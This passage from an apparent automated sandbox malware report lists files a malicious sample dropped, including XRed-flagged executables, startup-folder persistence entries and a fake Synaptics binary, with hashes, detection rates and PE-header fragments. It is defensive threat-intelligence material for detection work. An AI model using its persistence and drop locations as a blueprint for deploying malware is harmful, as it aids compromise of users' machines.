                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Program Files (x86)\2.exe, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 89%
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................B=...................@..........................@G..................@..............................B*......x9<..................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...x9<......:<.................@..P....................................@..P........................................................................................................................................

                                                                            C:\Program Files (x86)\3.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                            Category:dropped
                                                                            Size (bytes):9872
                                                                            Entropy (8bit):6.582338874776353
                                                                            Encrypted:false
                                                                            SSDEEP:96:75yFmm11gDnLWB0x6sBA0wHN7m8oB4eXMMhb/WJMepdgPYXa5yQILwKQMlZZptg:7i9oLE0xa0wt71MXMMFypdgPuLQILH0
                                                                            MD5:1EDB88F9EE745EAAEE2CBD8219318EB0
                                                                            SHA1:6561C12D51090972B6F866F38F8ED281C5C83313
                                                                            SHA-256:0AC1125284E2600D3714C0226F800F4D8D9AA291FA299BB1D33B7D8984B5E1C0
                                                                            SHA-512:A2A20A70C9E1DB729F716706796027A5C9002AD000E75C0DCED3ECE6F26D76EE0803ACC31D3A116266E711EC6A16D33C0668412238DFE0F128F3A841232FF4C5
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 87%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........FR..'<..'<..'<..v.'<..v..'<.._...'<..'=..'<..u..'<..u.'<.Rich.'<.........................PE..L...:.f................. ........................@.......................................@.........................................................................................................................................................UPX0....................................UPX1..... ..........................@...UPX2................................@..............................................................................................................................................................................................................................................................................................................................................................................................................2.02.UPX!....

                                                                            C:\Program Files (x86)\4.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):346414
                                                                            Entropy (8bit):6.861892987708496
                                                                            Encrypted:false
                                                                            SSDEEP:6144:jiubWrNSOetO6cprlQAOWizGLIoSdQX+tJs0/br:uubsNSOetfARQAPyGU2X+tZ/n
                                                                            MD5:39E7BE73C7531AC895F75834FDC1BCD6
                                                                            SHA1:646B88B488CF673C38B56FE7748C70B31BB29FC3
                                                                            SHA-256:A176E32335D81E69906F1C062E62247E97B8863F2C6148A36713E5BED5D16195
                                                                            SHA-512:E5C34EF2D309EF2071495A359999B9F8DBEB6D7DB1DAA67E82494D71B0F1E888D0958B5A503CB3B0E505B70F26CFEFE362D6301599143BEDB40A19FDB60EF072
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 68%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w..w..w..<.V.w..<.T..w..<.U.w....Z.w......w......w......w...$.w...4.w..w..v......w......w....X.w......w..Rich.w..........PE..L......d...............!.....................@....@..........................p............@.............................4.......P....`..t....................@...#......T............................f..@............@..x...\... ....................text....-.......................... ..`.rdata......@.......2..............@..@.data...PG..........................@....didat.......P......................@....rsrc........`......................@..@.reloc...#...@...$..................@..B................................................................................................................................................................................................................................................

                                                                            C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):118
                                                                            Entropy (8bit):3.5700810731231707
                                                                            Encrypted:false
                                                                            SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                            MD5:573220372DA4ED487441611079B623CD
                                                                            SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                            SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                            SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                            C:\ProgramData\Synaptics\RCXF181.tmp

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\1.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):771584
                                                                            Entropy (8bit):6.626509498726225
                                                                            Encrypted:false
                                                                            SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IMr:ansJ39LyjbJkQFMhmC+6GD9H
                                                                            MD5:00367A9FAA8069389A97267D772563E8
                                                                            SHA1:1C5301544B6B3FC11B71B6A2EBBD1D40F193619E
                                                                            SHA-256:2B451F3AE3ABEE380824404CDF795090102D57D7D369D861EC3BDA35528F2DF0
                                                                            SHA-512:D31767C02686D40BC60BC7439D9708EC6D67A904AF12A150650174BFCC0C432E3C5A3DCA87710EB06E2FE97903805B7C01949274F9C9DE3EA05187F4DF457EB5
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCXF181.tmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCXF181.tmp, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 100%
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                            C:\ProgramData\Synaptics\Synaptics.exe

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\1.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):830976
                                                                            Entropy (8bit):6.743094412845321
                                                                            Encrypted:false
                                                                            SSDEEP:12288:xMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9oKXMg14ldj:xnsJ39LyjbJkQFMhmC+6GD9+vF
                                                                            MD5:D026CFE00B08DA14B0A8B7F8860887D7
                                                                            SHA1:08EF96351067F151C19B9CC21605EA018FB43A18
                                                                            SHA-256:E261D309F30DE33A1BA0AA43604DB15F3326C6C8C5B291BDD52F18EA361FE3DD
                                                                            SHA-512:4EF560FF8C6A9A143B9365884C0C999A1FBF5EE638F170AD96ADD2B8B56933038D573CB31F45724A7F1A7B6A35CD2557344BD55C746FC9E9DA38ECD3BDD6361D
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 100%
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                            C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bykcxw.exe

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\4.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):12970
                                                                            Entropy (8bit):4.592916429638264
                                                                            Encrypted:false
                                                                            SSDEEP:192:Gj2vcC0eR0LwiK7wT5fWhm4nJBwaFTFyMCnj4mofRL6tU1:GjtjeROK7wT5fWhm4n/wUZo4moZL6m
                                                                            MD5:110A1568963118F3ACE3FCBE886A5014
                                                                            SHA1:1FDAB62BB3A0D1D281C24D890F1E75731A660373
                                                                            SHA-256:5268461A1CFE7FA7322EB1EBC97BB6695EBEF101AE42AF3AFA844A9DDF7017A6
                                                                            SHA-512:4738298B8254568E6DD74C62222BB024FE68C6BA6E5B8EA946BD60397FD7FDCC081384482755E82A8DE492895C87B1EF5EFDE71972A54E46D7EC400DE2973B1D
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 91%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&R..G<..G<..G<....G<.....G<..?...G<..G=..G<.....G<....G<.Rich.G<.........PE..L....!.g.....................<......z........ ....@.......................................@.................................x2..<.................................................................................... ...............................text............................... ..`.rdata....... ......................@..@.data...L!...@.......(..............@....CRT.........p.......*..............@..@.reloc...............,..............@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cbas.lnk

                                                                            Download File
                                                                            Process:C:\Windows\wic.exe
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Sat Nov 2 13:16:07 2024, mtime=Sat Nov 2 13:16:13 2024, atime=Sat Nov 2 12:00:35 2024, length=295424, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):795
                                                                            Entropy (8bit):4.780602957967742
                                                                            Encrypted:false
                                                                            SSDEEP:24:8+52kaszxaOA9+WZ2+J2bMQdpOpGhmxG:8g2hsFaVjYMEXdpu0Q
                                                                            MD5:64C03FC25A3910E81DD3546B9F3AD9DC
                                                                            SHA1:91FAB936A1C333B2E8CE2E5F265AD70B391CC837
                                                                            SHA-256:8C510C1B0BF0150FDA99F7ECCA9D82D7671C9839CC719226B5F06E95BCF814AF
                                                                            SHA-512:205431CEC31F540C50D0694FAF917F0FCA845A9FAA1552BA80495CAAC21FF35F9B917C5B19A015A01CE7A1494F2FA4E4A7BB4381C1049599266FA8E3C84AB9D3
                                                                            Malicious:false
                                                                            Preview:L..................F.... ....".1-...}..1-.....4'-...............................P.O. .:i.....+00.../C:\...................V.1.....^Yey..Windows.@......OwHbYik....8.....................-...W.i.n.d.o.w.s.....Z.2.....bY.h .cbas.exe..B......bY.rbY.r.....R........................c.b.a.s...e.x.e.......B...............-.......A............e=(.....C:\Windows\cbas.exe........\.....\.....\.W.i.n.d.o.w.s.\.c.b.a.s...e.x.e...C.:.\.W.i.n.d.o.w.s.........$..................C..B..g..(.#....`.......X.......desktop-41g4k28..P....A....r.............).J..P....A....r.............).J.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.5.7.4.2.7.7.0.1.6.-.1.5.6.3.0.8.5.8.6.1.-.2.1.0.3.6.0.1.2.2.7.-.1.0.0.0.........9...1SPS..mD..pH.H@..=x.....h....H.....K.X..K..cf................

                                                                            C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cghqi.exe

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\4.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):17578
                                                                            Entropy (8bit):4.664422564409853
                                                                            Encrypted:false
                                                                            SSDEEP:384:KUW+Y3/FTM6hooyTZuNdUHElY6yMS6KodYfzW8YZGrmoZLFQR:KUWFdTM6hfM1HElFDvKQYfzdYZOC
                                                                            MD5:A0F270AD119216C8200862C636F7BEFB
                                                                            SHA1:7104C0D3FBFD2B4B888960F82DFD2A0FA7DF08D6
                                                                            SHA-256:597C8B230898A37E6E9C004DB74BD5AD1F8C71B058B0371A12BF6F32536CAA3D
                                                                            SHA-512:0CE42BB44BB5E19AD61C563D7245A8E0838EB3728DA4FC18B14AD5EA202BFB3032248AD81D740531186BBDF8A961495B7889CCD0CE67909975EBA37F4B0ED348
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&R..G<..G<..G<....G<.....G<..?...G<..G=..G<.....G<....G<.Rich.G<.........PE..L.....#g.....................N......z........ ....@.......................................@..................................B..<.................................................................................... ...............................text............................... ..`.rdata...$... ...&..................@..@.data...."...P.......:..............@....CRT.................<..............@..@.reloc...............>..............@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\clxa.exe

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\4.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                            Category:dropped
                                                                            Size (bytes):9872
                                                                            Entropy (8bit):6.582338874776353
                                                                            Encrypted:false
                                                                            SSDEEP:96:75yFmm11gDnLWB0x6sBA0wHN7m8oB4eXMMhb/WJMepdgPYXa5yQILwKQMlZZptg:7i9oLE0xa0wt71MXMMFypdgPuLQILH0
                                                                            MD5:1EDB88F9EE745EAAEE2CBD8219318EB0
                                                                            SHA1:6561C12D51090972B6F866F38F8ED281C5C83313
                                                                            SHA-256:0AC1125284E2600D3714C0226F800F4D8D9AA291FA299BB1D33B7D8984B5E1C0
                                                                            SHA-512:A2A20A70C9E1DB729F716706796027A5C9002AD000E75C0DCED3ECE6F26D76EE0803ACC31D3A116266E711EC6A16D33C0668412238DFE0F128F3A841232FF4C5
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 87%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........FR..'<..'<..'<..v.'<..v..'<.._...'<..'=..'<..u..'<..u.'<.Rich.'<.........................PE..L...:.f................. ........................@.......................................@.........................................................................................................................................................UPX0....................................UPX1..... ..........................@...UPX2................................@..............................................................................................................................................................................................................................................................................................................................................................................................................2.02.UPX!....

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\1[1].exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):830976
                                                                            Entropy (8bit):6.743094412845321
                                                                            Encrypted:false
                                                                            SSDEEP:12288:xMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9oKXMg14ldj:xnsJ39LyjbJkQFMhmC+6GD9+vF
                                                                            MD5:D026CFE00B08DA14B0A8B7F8860887D7
                                                                            SHA1:08EF96351067F151C19B9CC21605EA018FB43A18
                                                                            SHA-256:E261D309F30DE33A1BA0AA43604DB15F3326C6C8C5B291BDD52F18EA361FE3DD
                                                                            SHA-512:4EF560FF8C6A9A143B9365884C0C999A1FBF5EE638F170AD96ADD2B8B56933038D573CB31F45724A7F1A7B6A35CD2557344BD55C746FC9E9DA38ECD3BDD6361D
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\1[1].exe, Author: Joe Security
                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\1[1].exe, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 100%
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\wic[1].exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3483648
                                                                            Entropy (8bit):7.130127005924049
                                                                            Encrypted:false
                                                                            SSDEEP:98304:AC4igShR3sZxWFJhbmp2KuSKafRJFLOAkGkzdnEVomFHKnP:F4ifqEwuSKanFLOyomFHKnP
                                                                            MD5:6AD65B03E75BC5509BA3104510178EE6
                                                                            SHA1:DBA73F97938D2DAB4BF8FB8076B363DB82AD3A16
                                                                            SHA-256:4D74EB72321C5137ED364541DEEF19DDC30593FFF62ABAB2A3D17A0BAD7BD5C6
                                                                            SHA-512:976C7ABA50E17271F6AEA4AB80E7BC89E68727164D98D99566E0752B4989D716A849B0CC53F0321A53DCE6086EF4CAB1604AAE8456CE76BFEACF185137AA8BA8
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 39%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.3.#.].#.].#.].F.^.=.].F.Y...].F.X...].F.[. .].q.Y...].q.^.:.].q.X._.].F.\...].#.\.5.]...T. .].....".].#..".]..._.".].Rich#.].................PE..L....>&g.....................R...............0....@...........................5...........@..................................[..|....P.......................p3..2......p...............................@............0...............................text............................... ..`.rdata...b...0...d..................@..@.data...........^..................@....rsrc........P......................@..@.reloc...2...p3..4....2.............@..B........................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\3[1].exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                            Category:dropped
                                                                            Size (bytes):9872
                                                                            Entropy (8bit):6.582338874776353
                                                                            Encrypted:false
                                                                            SSDEEP:96:75yFmm11gDnLWB0x6sBA0wHN7m8oB4eXMMhb/WJMepdgPYXa5yQILwKQMlZZptg:7i9oLE0xa0wt71MXMMFypdgPuLQILH0
                                                                            MD5:1EDB88F9EE745EAAEE2CBD8219318EB0
                                                                            SHA1:6561C12D51090972B6F866F38F8ED281C5C83313
                                                                            SHA-256:0AC1125284E2600D3714C0226F800F4D8D9AA291FA299BB1D33B7D8984B5E1C0
                                                                            SHA-512:A2A20A70C9E1DB729F716706796027A5C9002AD000E75C0DCED3ECE6F26D76EE0803ACC31D3A116266E711EC6A16D33C0668412238DFE0F128F3A841232FF4C5
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 87%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........FR..'<..'<..'<..v.'<..v..'<.._...'<..'=..'<..u..'<..u.'<.Rich.'<.........................PE..L...:.f................. ........................@.......................................@.........................................................................................................................................................UPX0....................................UPX1..... ..........................@...UPX2................................@..............................................................................................................................................................................................................................................................................................................................................................................................................2.02.UPX!....

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msslac[1].dll

                                                                            Download File
                                                                            Process:C:\Windows\wic.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):208896
                                                                            Entropy (8bit):6.070094852016993
                                                                            Encrypted:false
                                                                            SSDEEP:3072:gPTXczuCIcS5TqD4ejPXptBacZEvDkFOS94NtP6p6TQceOM:mszGT5TqEer9a6Evw26pK
                                                                            MD5:5E3BC49297F0765C486693790157273F
                                                                            SHA1:7CFD2A0465B27C7201C5F096495201D16F5771EB
                                                                            SHA-256:7420929E197D7328C047B8CB9075258367AC58935A8DA197F0A8A8C856292633
                                                                            SHA-512:6F7E2948C72398422B160D735E8D133EB95F91567820AC9C8853AA75CF2B1F9712242F538950BF969B9A0933FE659CDA0CDF2DB77B34FF22A99A875FB392D612
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s.............q.....q.........g.............#.......................................Rich....................PE..L.....&g...........!......... ......B........................................p......)T...............................{..C...pg...........:................... ..x...p................................C..@....................f..@....................text...^........................... ..`.rdata...k.......p..................@..@.data...|Z....... ..................@....rsrc....:.......@..................@..@.reloc...I... ...P..................@..B................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\4[1].exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):346414
                                                                            Entropy (8bit):6.861892987708496
                                                                            Encrypted:false
                                                                            SSDEEP:6144:jiubWrNSOetO6cprlQAOWizGLIoSdQX+tJs0/br:uubsNSOetfARQAPyGU2X+tZ/n
                                                                            MD5:39E7BE73C7531AC895F75834FDC1BCD6
                                                                            SHA1:646B88B488CF673C38B56FE7748C70B31BB29FC3
                                                                            SHA-256:A176E32335D81E69906F1C062E62247E97B8863F2C6148A36713E5BED5D16195
                                                                            SHA-512:E5C34EF2D309EF2071495A359999B9F8DBEB6D7DB1DAA67E82494D71B0F1E888D0958B5A503CB3B0E505B70F26CFEFE362D6301599143BEDB40A19FDB60EF072
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 68%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w..w..w..<.V.w..<.T..w..<.U.w....Z.w......w......w......w...$.w...4.w..w..v......w......w....X.w......w..Rich.w..........PE..L......d...............!.....................@....@..........................p............@.............................4.......P....`..t....................@...#......T............................f..@............@..x...\... ....................text....-.......................... ..`.rdata......@.......2..............@..@.data...PG..........................@....didat.......P......................@....rsrc........`......................@..@.reloc...#...@...$..................@..B................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\cbas[1].lnk

                                                                            Download File
                                                                            Process:C:\Windows\wic.exe
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Sat Nov 2 13:16:07 2024, mtime=Sat Nov 2 13:16:13 2024, atime=Sat Nov 2 12:00:35 2024, length=295424, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):795
                                                                            Entropy (8bit):4.780602957967742
                                                                            Encrypted:false
                                                                            SSDEEP:24:8+52kaszxaOA9+WZ2+J2bMQdpOpGhmxG:8g2hsFaVjYMEXdpu0Q
                                                                            MD5:64C03FC25A3910E81DD3546B9F3AD9DC
                                                                            SHA1:91FAB936A1C333B2E8CE2E5F265AD70B391CC837
                                                                            SHA-256:8C510C1B0BF0150FDA99F7ECCA9D82D7671C9839CC719226B5F06E95BCF814AF
                                                                            SHA-512:205431CEC31F540C50D0694FAF917F0FCA845A9FAA1552BA80495CAAC21FF35F9B917C5B19A015A01CE7A1494F2FA4E4A7BB4381C1049599266FA8E3C84AB9D3
                                                                            Malicious:false
                                                                            Preview:L..................F.... ....".1-...}..1-.....4'-...............................P.O. .:i.....+00.../C:\...................V.1.....^Yey..Windows.@......OwHbYik....8.....................-...W.i.n.d.o.w.s.....Z.2.....bY.h .cbas.exe..B......bY.rbY.r.....R........................c.b.a.s...e.x.e.......B...............-.......A............e=(.....C:\Windows\cbas.exe........\.....\.....\.W.i.n.d.o.w.s.\.c.b.a.s...e.x.e...C.:.\.W.i.n.d.o.w.s.........$..................C..B..g..(.#....`.......X.......desktop-41g4k28..P....A....r.............).J..P....A....r.............).J.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.5.7.4.2.7.7.0.1.6.-.1.5.6.3.0.8.5.8.6.1.-.2.1.0.3.6.0.1.2.2.7.-.1.0.0.0.........9...1SPS..mD..pH.H@..=x.....h....H.....K.X..K..cf................

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\2[1].exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):4645376
                                                                            Entropy (8bit):7.861574505223912
                                                                            Encrypted:false
                                                                            SSDEEP:98304:3nsmtk2aqBB6wcOBfKGSUjkO80kI//gmiklAV+vuGKiSB8zI9ShRbfVdsFWV:3LxiGtJkI/9JQ+vuziSXkfBdko
                                                                            MD5:85A57509DB3E9DFA7B4E451B8243220D
                                                                            SHA1:EE21F93372218959F8B3DCEFAA2C680D857E9E52
                                                                            SHA-256:FCD8D4592CF92FB9F9235A2774CDC8AFF4265D4015269FB7AA995182F8CE26E1
                                                                            SHA-512:104615F2366E06CBBA58A87F2E01D6806C1871C29AF8277E06FCDB385F4AE6BEB37C3BAFD861C320A01303A287A68AE9B5D8640F29A39C21FE38AD9803EBE00D
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\2[1].exe, Author: Joe Security
                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\2[1].exe, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 89%
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................B=...................@..........................@G..................@..............................B*......x9<..................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...x9<......:<.................@..P....................................@..P........................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cbas[1].exe

                                                                            Download File
                                                                            Process:C:\Windows\wic.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):295424
                                                                            Entropy (8bit):6.538320460768025
                                                                            Encrypted:false
                                                                            SSDEEP:6144:f+VQ8IwL+ws3cGW4sUwbSQ5LXqAKMQ0LAObegN:f+VDrrGW4sUwbSQpQ0LFey
                                                                            MD5:9FD7C0ACC95C7F1311BDE279D0B6A03A
                                                                            SHA1:D4F4669166DA05A147EFC8CCC0EEE9AFCA11E31C
                                                                            SHA-256:C79ED70E47990280B90BDC01049AF041B331E1559CFC34D3721B5AAB3E0A75D1
                                                                            SHA-512:CD8F0FB24B6E390249049507684C4C84D57A4C4BE9C5260C41A64C7B875D71FCE925582286A9D409D97797B33C2643F87EEA264505CB2103D20EAD6C82657B6A
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 47%
